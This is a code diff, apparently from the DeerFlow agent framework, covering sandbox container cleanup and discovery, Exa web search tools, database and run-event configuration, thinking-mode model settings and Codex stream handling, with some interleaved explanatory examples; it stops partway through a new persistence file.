"""Register signal handlers for graceful shutdown."""
|
||||
"""Register signal handlers for graceful shutdown.
|
||||
|
||||
Handles SIGTERM, SIGINT, and SIGHUP (terminal close) to ensure
|
||||
sandbox containers are cleaned up even when the user closes the terminal.
|
||||
"""
|
||||
self._original_sigterm = signal.getsignal(signal.SIGTERM)
|
||||
self._original_sigint = signal.getsignal(signal.SIGINT)
|
||||
self._original_sighup = signal.getsignal(signal.SIGHUP) if hasattr(signal, "SIGHUP") else None
|
||||
|
||||
def signal_handler(signum, frame):
|
||||
self.shutdown()
|
||||
original = self._original_sigterm if signum == signal.SIGTERM else self._original_sigint
|
||||
if signum == signal.SIGTERM:
|
||||
original = self._original_sigterm
|
||||
elif hasattr(signal, "SIGHUP") and signum == signal.SIGHUP:
|
||||
original = self._original_sighup
|
||||
else:
|
||||
original = self._original_sigint
|
||||
if callable(original):
|
||||
original(signum, frame)
|
||||
elif original == signal.SIG_DFL:
|
||||
@@ -332,6 +390,8 @@ class AioSandboxProvider(SandboxProvider):
|
||||
try:
|
||||
signal.signal(signal.SIGTERM, signal_handler)
|
||||
signal.signal(signal.SIGINT, signal_handler)
|
||||
if hasattr(signal, "SIGHUP"):
|
||||
signal.signal(signal.SIGHUP, signal_handler)
|
||||
except ValueError:
|
||||
logger.debug("Could not register signal handlers (not main thread)")
|
||||
|
||||
|
||||
@@ -96,3 +96,19 @@ class SandboxBackend(ABC):
|
||||
SandboxInfo if found and healthy, None otherwise.
|
||||
"""
|
||||
...
|
||||
|
||||
def list_running(self) -> list[SandboxInfo]:
|
||||
"""Enumerate all running sandboxes managed by this backend.
|
||||
|
||||
Used for startup reconciliation: when the process restarts, it needs
|
||||
to discover containers started by previous processes so they can be
|
||||
adopted into the warm pool or destroyed if idle too long.
|
||||
|
||||
The default implementation returns an empty list, which is correct
|
||||
for backends that don't manage local containers (e.g., RemoteSandboxBackend
|
||||
delegates lifecycle to the provisioner, which handles its own cleanup).
|
||||
|
||||
Returns:
|
||||
A list of SandboxInfo for all currently running sandboxes.
|
||||
"""
|
||||
return []
|
||||
|
||||
@@ -6,9 +6,11 @@ Handles container lifecycle, port allocation, and cross-process container discov
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import subprocess
|
||||
from datetime import datetime
|
||||
|
||||
from deerflow.utils.network import get_free_port, release_port
|
||||
|
||||
@@ -18,6 +20,52 @@ from .sandbox_info import SandboxInfo
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def _parse_docker_timestamp(raw: str) -> float:
|
||||
"""Parse Docker's ISO 8601 timestamp into a Unix epoch float.
|
||||
|
||||
Docker returns timestamps with nanosecond precision and a trailing ``Z``
|
||||
(e.g. ``2026-04-08T01:22:50.123456789Z``). Python's ``fromisoformat``
|
||||
accepts at most microseconds and (pre-3.11) does not accept ``Z``, so the
|
||||
string is normalized before parsing. Returns ``0.0`` on empty input or
|
||||
parse failure so callers can use ``0.0`` as a sentinel for "unknown age".
|
||||
"""
|
||||
if not raw:
|
||||
return 0.0
|
||||
try:
|
||||
s = raw.strip()
|
||||
if "." in s:
|
||||
dot_pos = s.index(".")
|
||||
tz_start = dot_pos + 1
|
||||
while tz_start < len(s) and s[tz_start].isdigit():
|
||||
tz_start += 1
|
||||
frac = s[dot_pos + 1 : tz_start][:6] # truncate to microseconds
|
||||
tz_suffix = s[tz_start:]
|
||||
s = s[: dot_pos + 1] + frac + tz_suffix
|
||||
if s.endswith("Z"):
|
||||
s = s[:-1] + "+00:00"
|
||||
return datetime.fromisoformat(s).timestamp()
|
||||
except (ValueError, TypeError) as e:
|
||||
logger.debug(f"Could not parse docker timestamp {raw!r}: {e}")
|
||||
return 0.0
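Illustrative inputs and outputs (values assumed):

```
ts = _parse_docker_timestamp("2026-04-08T01:22:50.123456789Z")
assert ts > 0.0                                      # nanoseconds truncated, trailing Z handled
assert _parse_docker_timestamp("") == 0.0            # sentinel for "unknown age"
assert _parse_docker_timestamp("not-a-date") == 0.0  # parse failure maps to the same sentinel
```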
def _extract_host_port(inspect_entry: dict, container_port: int) -> int | None:
|
||||
"""Extract the host port mapped to ``container_port/tcp`` from a docker inspect entry.
|
||||
|
||||
Returns None if the container has no port mapping for that port.
|
||||
"""
|
||||
try:
|
||||
ports = (inspect_entry.get("NetworkSettings") or {}).get("Ports") or {}
|
||||
bindings = ports.get(f"{container_port}/tcp") or []
|
||||
if bindings:
|
||||
host_port = bindings[0].get("HostPort")
|
||||
if host_port:
|
||||
return int(host_port)
|
||||
except (ValueError, TypeError, AttributeError):
|
||||
pass
|
||||
return None
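A minimal example against the docker inspect shape (the entry is abbreviated to the fields the helper reads):

```
entry = {"NetworkSettings": {"Ports": {"8080/tcp": [{"HostIp": "0.0.0.0", "HostPort": "49213"}]}}}
assert _extract_host_port(entry, 8080) == 49213
assert _extract_host_port({"NetworkSettings": {"Ports": {}}}, 8080) is None  # no mapping
```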
def _format_container_mount(runtime: str, host_path: str, container_path: str, read_only: bool) -> list[str]:
|
||||
"""Format a bind-mount argument for the selected runtime.
|
||||
|
||||
@@ -172,8 +220,12 @@ class LocalContainerBackend(SandboxBackend):
|
||||
|
||||
def destroy(self, info: SandboxInfo) -> None:
|
||||
"""Stop the container and release its port."""
|
||||
if info.container_id:
|
||||
self._stop_container(info.container_id)
|
||||
# Prefer container_id, fall back to container_name (both accepted by docker stop).
|
||||
# This ensures containers discovered via list_running() (which only has the name)
|
||||
# can also be stopped.
|
||||
stop_target = info.container_id or info.container_name
|
||||
if stop_target:
|
||||
self._stop_container(stop_target)
|
||||
# Extract port from sandbox_url for release
|
||||
try:
|
||||
from urllib.parse import urlparse
|
||||
@@ -222,6 +274,129 @@ class LocalContainerBackend(SandboxBackend):
|
||||
container_name=container_name,
|
||||
)
|
||||
|
||||
def list_running(self) -> list[SandboxInfo]:
|
||||
"""Enumerate all running containers matching the configured prefix.
|
||||
|
||||
Uses a single ``docker ps`` call to list container names, then a
|
||||
single batched ``docker inspect`` call to retrieve creation timestamp
|
||||
and port mapping for all containers at once. Total subprocess calls:
|
||||
2 (down from 2N+1 in the naive per-container approach).
|
||||
|
||||
Note: Docker's ``--filter name=`` performs *substring* matching,
|
||||
so a secondary ``startswith`` check is applied to ensure only
|
||||
containers with the exact prefix are included.
|
||||
|
||||
Containers without port mappings are still included (with empty
|
||||
sandbox_url) so that startup reconciliation can adopt orphans
|
||||
regardless of their port state.
|
||||
"""
|
||||
# Step 1: enumerate container names via docker ps
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[
|
||||
self._runtime,
|
||||
"ps",
|
||||
"--filter",
|
||||
f"name={self._container_prefix}-",
|
||||
"--format",
|
||||
"{{.Names}}",
|
||||
],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=10,
|
||||
)
|
||||
if result.returncode != 0:
|
||||
stderr = (result.stderr or "").strip()
|
||||
logger.warning(
|
||||
"Failed to list running containers with %s ps (returncode=%s, stderr=%s)",
|
||||
self._runtime,
|
||||
result.returncode,
|
||||
stderr or "<empty>",
|
||||
)
|
||||
return []
|
||||
if not result.stdout.strip():
|
||||
return []
|
||||
except (subprocess.CalledProcessError, subprocess.TimeoutExpired, FileNotFoundError, OSError) as e:
|
||||
logger.warning(f"Failed to list running containers: {e}")
|
||||
return []
|
||||
|
||||
# Filter to names matching our exact prefix (docker filter is substring-based)
|
||||
container_names = [name.strip() for name in result.stdout.strip().splitlines() if name.strip().startswith(self._container_prefix + "-")]
|
||||
if not container_names:
|
||||
return []
|
||||
|
||||
# Step 2: batched docker inspect — single subprocess call for all containers
|
||||
inspections = self._batch_inspect(container_names)
|
||||
|
||||
infos: list[SandboxInfo] = []
|
||||
sandbox_host = os.environ.get("DEER_FLOW_SANDBOX_HOST", "localhost")
|
||||
for container_name in container_names:
|
||||
data = inspections.get(container_name)
|
||||
if data is None:
|
||||
# Container disappeared between ps and inspect, or inspect failed
|
||||
continue
|
||||
created_at, host_port = data
|
||||
sandbox_id = container_name[len(self._container_prefix) + 1 :]
|
||||
sandbox_url = f"http://{sandbox_host}:{host_port}" if host_port else ""
|
||||
|
||||
infos.append(
|
||||
SandboxInfo(
|
||||
sandbox_id=sandbox_id,
|
||||
sandbox_url=sandbox_url,
|
||||
container_name=container_name,
|
||||
created_at=created_at,
|
||||
)
|
||||
)
|
||||
|
||||
logger.info(f"Found {len(infos)} running sandbox container(s)")
|
||||
return infos
|
||||
|
||||
def _batch_inspect(self, container_names: list[str]) -> dict[str, tuple[float, int | None]]:
|
||||
"""Batch-inspect containers in a single subprocess call.
|
||||
|
||||
Returns a mapping of ``container_name -> (created_at, host_port)``.
|
||||
Missing containers or parse failures are silently dropped from the result.
|
||||
"""
|
||||
if not container_names:
|
||||
return {}
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[self._runtime, "inspect", *container_names],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=15,
|
||||
)
|
||||
except (subprocess.CalledProcessError, subprocess.TimeoutExpired, FileNotFoundError, OSError) as e:
|
||||
logger.warning(f"Failed to batch-inspect containers: {e}")
|
||||
return {}
|
||||
|
||||
if result.returncode != 0:
|
||||
stderr = (result.stderr or "").strip()
|
||||
logger.warning(
|
||||
"Failed to batch-inspect containers with %s inspect (returncode=%s, stderr=%s)",
|
||||
self._runtime,
|
||||
result.returncode,
|
||||
stderr or "<empty>",
|
||||
)
|
||||
return {}
|
||||
|
||||
try:
|
||||
payload = json.loads(result.stdout or "[]")
|
||||
except json.JSONDecodeError as e:
|
||||
logger.warning(f"Failed to parse docker inspect output as JSON: {e}")
|
||||
return {}
|
||||
|
||||
out: dict[str, tuple[float, int | None]] = {}
|
||||
for entry in payload:
|
||||
# ``Name`` is prefixed with ``/`` in the docker inspect response
|
||||
name = (entry.get("Name") or "").lstrip("/")
|
||||
if not name:
|
||||
continue
|
||||
created_at = _parse_docker_timestamp(entry.get("Created", ""))
|
||||
host_port = _extract_host_port(entry, 8080)
|
||||
out[name] = (created_at, host_port)
|
||||
return out
|
||||
|
||||
# ── Container operations ─────────────────────────────────────────────
|
||||
|
||||
def _start_container(
|
||||
|
||||
@@ -0,0 +1,79 @@
|
||||
import json
|
||||
|
||||
from exa_py import Exa
|
||||
from langchain.tools import tool
|
||||
|
||||
from deerflow.config import get_app_config
|
||||
|
||||
|
||||
def _get_exa_client(tool_name: str = "web_search") -> Exa:
|
||||
config = get_app_config().get_tool_config(tool_name)
|
||||
api_key = None
|
||||
if config is not None and "api_key" in config.model_extra:
|
||||
api_key = config.model_extra.get("api_key")
|
||||
return Exa(api_key=api_key)
|
||||
|
||||
|
||||
@tool("web_search", parse_docstring=True)
|
||||
def web_search_tool(query: str) -> str:
|
||||
"""Search the web.
|
||||
|
||||
Args:
|
||||
query: The query to search for.
|
||||
"""
|
||||
try:
|
||||
config = get_app_config().get_tool_config("web_search")
|
||||
max_results = 5
|
||||
search_type = "auto"
|
||||
contents_max_characters = 1000
|
||||
if config is not None:
|
||||
max_results = config.model_extra.get("max_results", max_results)
|
||||
search_type = config.model_extra.get("search_type", search_type)
|
||||
contents_max_characters = config.model_extra.get("contents_max_characters", contents_max_characters)
|
||||
|
||||
client = _get_exa_client()
|
||||
res = client.search(
|
||||
query,
|
||||
type=search_type,
|
||||
num_results=max_results,
|
||||
contents={"highlights": {"max_characters": contents_max_characters}},
|
||||
)
|
||||
|
||||
normalized_results = [
|
||||
{
|
||||
"title": result.title or "",
|
||||
"url": result.url or "",
|
||||
"snippet": "\n".join(result.highlights) if result.highlights else "",
|
||||
}
|
||||
for result in res.results
|
||||
]
|
||||
json_results = json.dumps(normalized_results, indent=2, ensure_ascii=False)
|
||||
return json_results
|
||||
except Exception as e:
|
||||
return f"Error: {str(e)}"
@tool("web_fetch", parse_docstring=True)
|
||||
def web_fetch_tool(url: str) -> str:
|
||||
"""Fetch the contents of a web page at a given URL.
|
||||
Only fetch EXACT URLs that have been provided directly by the user or have been returned in results from the web_search and web_fetch tools.
|
||||
This tool can NOT access content that requires authentication, such as private Google Docs or pages behind login walls.
|
||||
Do NOT add www. to URLs that do NOT have them.
|
||||
URLs must include the schema: https://example.com is a valid URL while example.com is an invalid URL.
|
||||
|
||||
Args:
|
||||
url: The URL to fetch the contents of.
|
||||
"""
|
||||
try:
|
||||
client = _get_exa_client("web_fetch")
|
||||
res = client.get_contents([url], text={"max_characters": 4096})
|
||||
|
||||
if res.results:
|
||||
result = res.results[0]
|
||||
title = result.title or "Untitled"
|
||||
text = result.text or ""
|
||||
return f"# {title}\n\n{text[:4096]}"
|
||||
else:
|
||||
return "Error: No results found"
|
||||
except Exception as e:
|
||||
return f"Error: {str(e)}"
|
||||
@@ -6,10 +6,10 @@ from langchain.tools import tool
|
||||
from deerflow.config import get_app_config
|
||||
|
||||
|
||||
def _get_firecrawl_client() -> FirecrawlApp:
|
||||
config = get_app_config().get_tool_config("web_search")
|
||||
def _get_firecrawl_client(tool_name: str = "web_search") -> FirecrawlApp:
|
||||
config = get_app_config().get_tool_config(tool_name)
|
||||
api_key = None
|
||||
if config is not None:
|
||||
if config is not None and "api_key" in config.model_extra:
|
||||
api_key = config.model_extra.get("api_key")
|
||||
return FirecrawlApp(api_key=api_key) # type: ignore[arg-type]
|
||||
|
||||
@@ -27,7 +27,7 @@ def web_search_tool(query: str) -> str:
|
||||
if config is not None:
|
||||
max_results = config.model_extra.get("max_results", max_results)
|
||||
|
||||
client = _get_firecrawl_client()
|
||||
client = _get_firecrawl_client("web_search")
|
||||
result = client.search(query, limit=max_results)
|
||||
|
||||
# result.web contains list of SearchResultWeb objects
|
||||
@@ -58,7 +58,7 @@ def web_fetch_tool(url: str) -> str:
|
||||
url: The URL to fetch the contents of.
|
||||
"""
|
||||
try:
|
||||
client = _get_firecrawl_client()
|
||||
client = _get_firecrawl_client("web_fetch")
|
||||
result = client.scrape(url, formats=["markdown"])
|
||||
|
||||
markdown_content = result.markdown or ""
|
||||
|
||||
@@ -10,10 +10,12 @@ from pydantic import BaseModel, ConfigDict, Field
|
||||
|
||||
from deerflow.config.acp_config import load_acp_config_from_dict
|
||||
from deerflow.config.checkpointer_config import CheckpointerConfig, load_checkpointer_config_from_dict
|
||||
from deerflow.config.database_config import DatabaseConfig
|
||||
from deerflow.config.extensions_config import ExtensionsConfig
|
||||
from deerflow.config.guardrails_config import GuardrailsConfig, load_guardrails_config_from_dict
|
||||
from deerflow.config.memory_config import MemoryConfig, load_memory_config_from_dict
|
||||
from deerflow.config.model_config import ModelConfig
|
||||
from deerflow.config.run_events_config import RunEventsConfig
|
||||
from deerflow.config.sandbox_config import SandboxConfig
|
||||
from deerflow.config.skill_evolution_config import SkillEvolutionConfig
|
||||
from deerflow.config.skills_config import SkillsConfig
|
||||
@@ -56,6 +58,8 @@ class AppConfig(BaseModel):
|
||||
subagents: SubagentsAppConfig = Field(default_factory=SubagentsAppConfig, description="Subagent runtime configuration")
|
||||
guardrails: GuardrailsConfig = Field(default_factory=GuardrailsConfig, description="Guardrail middleware configuration")
|
||||
model_config = ConfigDict(extra="allow", frozen=False)
|
||||
database: DatabaseConfig = Field(default_factory=DatabaseConfig, description="Unified database backend configuration")
|
||||
run_events: RunEventsConfig = Field(default_factory=RunEventsConfig, description="Run event storage configuration")
|
||||
checkpointer: CheckpointerConfig | None = Field(default=None, description="Checkpointer configuration")
|
||||
stream_bridge: StreamBridgeConfig | None = Field(default=None, description="Stream bridge configuration")
|
||||
|
||||
|
||||
@@ -0,0 +1,92 @@
|
||||
"""Unified database backend configuration.
|
||||
|
||||
Controls BOTH the LangGraph checkpointer and the DeerFlow application
|
||||
persistence layer (runs, threads metadata, users, etc.). The user
|
||||
configures one backend; the system handles physical separation details.
|
||||
|
||||
SQLite mode: checkpointer and app use different .db files in the same
|
||||
directory to avoid write-lock contention. This is automatic.
|
||||
|
||||
Postgres mode: both use the same database URL but maintain independent
|
||||
connection pools with different lifecycles.
|
||||
|
||||
Memory mode: checkpointer uses MemorySaver, app uses in-memory stores.
|
||||
No database is initialized.
|
||||
|
||||
Sensitive values (postgres_url) should use $VAR syntax in config.yaml
|
||||
to reference environment variables from .env:
|
||||
|
||||
database:
|
||||
backend: postgres
|
||||
postgres_url: $DATABASE_URL
|
||||
|
||||
The $VAR resolution is handled by AppConfig.resolve_env_variables()
|
||||
before this config is instantiated -- DatabaseConfig itself does not
|
||||
need to do any environment variable processing.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
from typing import Literal
|
||||
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
|
||||
class DatabaseConfig(BaseModel):
|
||||
backend: Literal["memory", "sqlite", "postgres"] = Field(
|
||||
default="memory",
|
||||
description=("Storage backend for both checkpointer and application data. 'memory' for development (no persistence across restarts), 'sqlite' for single-node deployment, 'postgres' for production multi-node deployment."),
|
||||
)
|
||||
sqlite_dir: str = Field(
|
||||
default=".deer-flow/data",
|
||||
description=("Directory for SQLite database files. Checkpointer uses {sqlite_dir}/checkpoints.db, application data uses {sqlite_dir}/app.db."),
|
||||
)
|
||||
postgres_url: str = Field(
|
||||
default="",
|
||||
description=(
|
||||
"PostgreSQL connection URL, shared by checkpointer and app. "
|
||||
"Use $DATABASE_URL in config.yaml to reference .env. "
|
||||
"Example: postgresql://user:pass@host:5432/deerflow "
|
||||
"(the +asyncpg driver suffix is added automatically where needed)."
|
||||
),
|
||||
)
|
||||
echo_sql: bool = Field(
|
||||
default=False,
|
||||
description="Echo all SQL statements to log (debug only).",
|
||||
)
|
||||
pool_size: int = Field(
|
||||
default=5,
|
||||
description="Connection pool size for the app ORM engine (postgres only).",
|
||||
)
|
||||
|
||||
# -- Derived helpers (not user-configured) --
|
||||
|
||||
@property
|
||||
def _resolved_sqlite_dir(self) -> str:
|
||||
"""Resolve sqlite_dir to an absolute path (relative to CWD)."""
|
||||
from pathlib import Path
|
||||
|
||||
return str(Path(self.sqlite_dir).resolve())
|
||||
|
||||
@property
|
||||
def checkpointer_sqlite_path(self) -> str:
|
||||
"""SQLite file path for the LangGraph checkpointer."""
|
||||
return os.path.join(self._resolved_sqlite_dir, "checkpoints.db")
|
||||
|
||||
@property
|
||||
def app_sqlite_path(self) -> str:
|
||||
"""SQLite file path for application ORM data."""
|
||||
return os.path.join(self._resolved_sqlite_dir, "app.db")
|
||||
|
||||
@property
|
||||
def app_sqlalchemy_url(self) -> str:
|
||||
"""SQLAlchemy async URL for the application ORM engine."""
|
||||
if self.backend == "sqlite":
|
||||
return f"sqlite+aiosqlite:///{self.app_sqlite_path}"
|
||||
if self.backend == "postgres":
|
||||
url = self.postgres_url
|
||||
if url.startswith("postgresql://"):
|
||||
url = url.replace("postgresql://", "postgresql+asyncpg://", 1)
|
||||
return url
|
||||
raise ValueError(f"No SQLAlchemy URL for backend={self.backend!r}")
|
||||
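For orientation, a minimal sketch of how the derived helpers above resolve paths and URLs. The field and property names come straight from the class; the import path is an assumption, since this diff does not show the module name.

```python
# Hedged sketch -- exercises DatabaseConfig's derived helpers.
# The import path is hypothetical; adjust it to wherever the class lives.
from deerflow.config.database_config import DatabaseConfig  # hypothetical path

sqlite_cfg = DatabaseConfig(backend="sqlite", sqlite_dir=".deer-flow/data")
print(sqlite_cfg.checkpointer_sqlite_path)  # <sqlite_dir as absolute path>/checkpoints.db
print(sqlite_cfg.app_sqlalchemy_url)        # sqlite+aiosqlite:///<absolute app.db path>

pg_cfg = DatabaseConfig(
    backend="postgres",
    postgres_url="postgresql://user:pass@host:5432/deerflow",
)
print(pg_cfg.app_sqlalchemy_url)  # postgresql+asyncpg://user:pass@host:5432/deerflow
```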
@@ -27,6 +27,10 @@ class ModelConfig(BaseModel):
|
||||
default_factory=lambda: None,
|
||||
description="Extra settings to be passed to the model when thinking is enabled",
|
||||
)
|
||||
when_thinking_disabled: dict | None = Field(
|
||||
default_factory=lambda: None,
|
||||
description="Extra settings to be passed to the model when thinking is disabled",
|
||||
)
|
||||
supports_vision: bool = Field(default_factory=lambda: False, description="Whether the model supports vision/image inputs")
|
||||
thinking: dict | None = Field(
|
||||
default_factory=lambda: None,
|
||||
|
||||
@@ -0,0 +1,33 @@
|
||||
"""Run event storage configuration.
|
||||
|
||||
Controls where run events (messages + execution traces) are persisted.
|
||||
|
||||
Backends:
|
||||
- memory: In-memory storage, data lost on restart. Suitable for
|
||||
development and testing.
|
||||
- db: SQL database via SQLAlchemy ORM. Provides full query capability.
|
||||
Suitable for production deployments.
|
||||
- jsonl: Append-only JSONL files. Lightweight alternative for
|
||||
single-node deployments that need persistence without a database.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Literal
|
||||
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
|
||||
class RunEventsConfig(BaseModel):
|
||||
backend: Literal["memory", "db", "jsonl"] = Field(
|
||||
default="memory",
|
||||
description="Storage backend for run events. 'memory' for development (no persistence), 'db' for production (SQL queries), 'jsonl' for lightweight single-node persistence.",
|
||||
)
|
||||
max_trace_content: int = Field(
|
||||
default=10240,
|
||||
description="Maximum trace content size in bytes before truncation (db backend only).",
|
||||
)
|
||||
track_token_usage: bool = Field(
|
||||
default=True,
|
||||
description="Whether RunJournal should accumulate token counts to RunRow.",
|
||||
)
|
||||
@@ -56,6 +56,7 @@ def create_chat_model(name: str | None = None, thinking_enabled: bool = False, *
|
||||
"supports_thinking",
|
||||
"supports_reasoning_effort",
|
||||
"when_thinking_enabled",
|
||||
"when_thinking_disabled",
|
||||
"thinking",
|
||||
"supports_vision",
|
||||
},
|
||||
@@ -72,21 +73,24 @@ def create_chat_model(name: str | None = None, thinking_enabled: bool = False, *
|
||||
raise ValueError(f"Model {name} does not support thinking. Set `supports_thinking` to true in the `config.yaml` to enable thinking.") from None
|
||||
if effective_wte:
|
||||
model_settings_from_config.update(effective_wte)
|
||||
if not thinking_enabled and has_thinking_settings:
|
||||
if effective_wte.get("extra_body", {}).get("thinking", {}).get("type"):
|
||||
if not thinking_enabled:
|
||||
if model_config.when_thinking_disabled is not None:
|
||||
# User-provided disable settings take full precedence
|
||||
model_settings_from_config.update(model_config.when_thinking_disabled)
|
||||
elif has_thinking_settings and effective_wte.get("extra_body", {}).get("thinking", {}).get("type"):
|
||||
# OpenAI-compatible gateway: thinking is nested under extra_body
|
||||
model_settings_from_config["extra_body"] = _deep_merge_dicts(
|
||||
model_settings_from_config.get("extra_body"),
|
||||
{"thinking": {"type": "disabled"}},
|
||||
)
|
||||
model_settings_from_config["reasoning_effort"] = "minimal"
|
||||
elif disable_chat_template_kwargs := _vllm_disable_chat_template_kwargs(effective_wte.get("extra_body", {}).get("chat_template_kwargs") or {}):
|
||||
elif has_thinking_settings and (disable_chat_template_kwargs := _vllm_disable_chat_template_kwargs(effective_wte.get("extra_body", {}).get("chat_template_kwargs") or {})):
|
||||
# vLLM uses chat template kwargs to switch thinking on/off.
|
||||
model_settings_from_config["extra_body"] = _deep_merge_dicts(
|
||||
model_settings_from_config.get("extra_body"),
|
||||
{"chat_template_kwargs": disable_chat_template_kwargs},
|
||||
)
|
||||
elif effective_wte.get("thinking", {}).get("type"):
|
||||
elif has_thinking_settings and effective_wte.get("thinking", {}).get("type"):
|
||||
# Native langchain_anthropic: thinking is a direct constructor parameter
|
||||
model_settings_from_config["thinking"] = {"type": "disabled"}
|
||||
if not model_config.supports_reasoning_effort:
|
||||
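In words: when thinking is turned off and the user supplied no `when_thinking_disabled` override, the new code derives a disable payload from the enabled-mode settings instead of leaving them in place. A rough sketch of the OpenAI-compatible-gateway branch, with made-up field values and a simplified merge helper standing in for `_deep_merge_dicts`:

```python
# Illustrative only -- not the module's real helper, just the same idea.
def deep_merge(base: dict | None, extra: dict) -> dict:
    out = dict(base or {})
    for key, value in extra.items():
        if isinstance(value, dict) and isinstance(out.get(key), dict):
            out[key] = deep_merge(out[key], value)
        else:
            out[key] = value
    return out

# Suppose the settings collected so far carry the enabled-mode thinking block:
settings = {"extra_body": {"thinking": {"type": "enabled", "budget_tokens": 2048}}}

# With thinking_enabled=False and no when_thinking_disabled override,
# the gateway branch flips the nested type and minimizes reasoning effort:
settings["extra_body"] = deep_merge(settings.get("extra_body"), {"thinking": {"type": "disabled"}})
settings["reasoning_effort"] = "minimal"
# settings == {"extra_body": {"thinking": {"type": "disabled", "budget_tokens": 2048}},
#              "reasoning_effort": "minimal"}
```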
@@ -109,6 +113,15 @@ def create_chat_model(name: str | None = None, thinking_enabled: bool = False, *
|
||||
elif "reasoning_effort" not in model_settings_from_config:
|
||||
model_settings_from_config["reasoning_effort"] = "medium"
|
||||
|
||||
# Ensure stream_usage is enabled so that token usage metadata is available
|
||||
# in streaming responses. LangChain's BaseChatOpenAI only defaults
|
||||
# stream_usage=True when no custom base_url/api_base is set, so models
|
||||
# hitting third-party endpoints (e.g. doubao, deepseek) silently lose
|
||||
# usage data. We default it to True unless explicitly configured.
|
||||
if "stream_usage" not in model_settings_from_config and "stream_usage" not in kwargs:
|
||||
if "stream_usage" in getattr(model_class, "model_fields", {}):
|
||||
model_settings_from_config["stream_usage"] = True
|
||||
|
||||
model_instance = model_class(**kwargs, **model_settings_from_config)
|
||||
|
||||
callbacks = build_tracing_callbacks()
|
||||
|
||||
@@ -48,6 +48,10 @@ class CodexChatModel(BaseChatModel):
|
||||
|
||||
model_config = {"arbitrary_types_allowed": True}
|
||||
|
||||
@classmethod
|
||||
def is_lc_serializable(cls) -> bool:
|
||||
return True
|
||||
|
||||
@property
|
||||
def _llm_type(self) -> str:
|
||||
return "codex-responses"
|
||||
@@ -216,18 +220,48 @@ class CodexChatModel(BaseChatModel):
|
||||
def _stream_response(self, headers: dict, payload: dict) -> dict:
|
||||
"""Stream SSE from Codex API and collect the final response."""
|
||||
completed_response = None
|
||||
streamed_output_items: dict[int, dict[str, Any]] = {}
|
||||
|
||||
with httpx.Client(timeout=300) as client:
|
||||
with client.stream("POST", f"{CODEX_BASE_URL}/responses", headers=headers, json=payload) as resp:
|
||||
resp.raise_for_status()
|
||||
for line in resp.iter_lines():
|
||||
data = self._parse_sse_data_line(line)
|
||||
if data and data.get("type") == "response.completed":
|
||||
if not data:
|
||||
continue
|
||||
|
||||
event_type = data.get("type")
|
||||
if event_type == "response.output_item.done":
|
||||
output_index = data.get("output_index")
|
||||
output_item = data.get("item")
|
||||
if isinstance(output_index, int) and isinstance(output_item, dict):
|
||||
streamed_output_items[output_index] = output_item
|
||||
elif event_type == "response.completed":
|
||||
completed_response = data["response"]
|
||||
|
||||
if not completed_response:
|
||||
raise RuntimeError("Codex API stream ended without response.completed event")
|
||||
|
||||
# ChatGPT Codex can emit the final assistant content only in stream events.
|
||||
# When response.completed arrives, response.output may still be empty.
|
||||
if streamed_output_items:
|
||||
merged_output = []
|
||||
response_output = completed_response.get("output")
|
||||
if isinstance(response_output, list):
|
||||
merged_output = list(response_output)
|
||||
|
||||
max_index = max(max(streamed_output_items), len(merged_output) - 1)
|
||||
if max_index >= 0 and len(merged_output) <= max_index:
|
||||
merged_output.extend([None] * (max_index + 1 - len(merged_output)))
|
||||
|
||||
for output_index, output_item in streamed_output_items.items():
|
||||
existing_item = merged_output[output_index]
|
||||
if not isinstance(existing_item, dict):
|
||||
merged_output[output_index] = output_item
|
||||
|
||||
completed_response = dict(completed_response)
|
||||
completed_response["output"] = [item for item in merged_output if isinstance(item, dict)]
|
||||
|
||||
return completed_response
|
||||
|
||||
@staticmethod
|
||||
|
||||
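A toy illustration of that merge: an item captured from a `response.output_item.done` event fills the slot that the final `response.completed` payload left empty.

```python
# Toy data -- not real Codex payloads, just the merge behaviour shown above.
streamed_output_items = {0: {"type": "message", "content": "hello"}}
completed_response = {"id": "resp_1", "output": []}

merged_output: list = list(completed_response.get("output") or [])
max_index = max(max(streamed_output_items), len(merged_output) - 1)
if len(merged_output) <= max_index:
    merged_output.extend([None] * (max_index + 1 - len(merged_output)))
for idx, item in streamed_output_items.items():
    if not isinstance(merged_output[idx], dict):
        merged_output[idx] = item

completed_response["output"] = [i for i in merged_output if isinstance(i, dict)]
# -> {"id": "resp_1", "output": [{"type": "message", "content": "hello"}]}
```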
@@ -23,6 +23,14 @@ class PatchedChatDeepSeek(ChatDeepSeek):
|
||||
request payload.
|
||||
"""
|
||||
|
||||
@classmethod
|
||||
def is_lc_serializable(cls) -> bool:
|
||||
return True
|
||||
|
||||
@property
|
||||
def lc_secrets(self) -> dict[str, str]:
|
||||
return {"api_key": "DEEPSEEK_API_KEY", "openai_api_key": "DEEPSEEK_API_KEY"}
|
||||
|
||||
def _get_request_payload(
|
||||
self,
|
||||
input_: LanguageModelInput,
|
||||
|
||||
@@ -0,0 +1,13 @@
|
||||
"""DeerFlow application persistence layer (SQLAlchemy 2.0 async ORM).
|
||||
|
||||
This module manages DeerFlow's own application data -- runs metadata,
|
||||
thread ownership, cron jobs, users. It is completely separate from
|
||||
LangGraph's checkpointer, which manages graph execution state.
|
||||
|
||||
Usage:
|
||||
from deerflow.persistence import init_engine, close_engine, get_session_factory
|
||||
"""
|
||||
|
||||
from deerflow.persistence.engine import close_engine, get_engine, get_session_factory, init_engine
|
||||
|
||||
__all__ = ["close_engine", "get_engine", "get_session_factory", "init_engine"]
|
||||
@@ -0,0 +1,40 @@
|
||||
"""SQLAlchemy declarative base with automatic to_dict support.
|
||||
|
||||
All DeerFlow ORM models inherit from this Base. It provides a generic
|
||||
to_dict() method via SQLAlchemy's inspect() so individual models don't
|
||||
need to write their own serialization logic.
|
||||
|
||||
LangGraph's checkpointer tables are NOT managed by this Base.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from sqlalchemy import inspect as sa_inspect
|
||||
from sqlalchemy.orm import DeclarativeBase
|
||||
|
||||
|
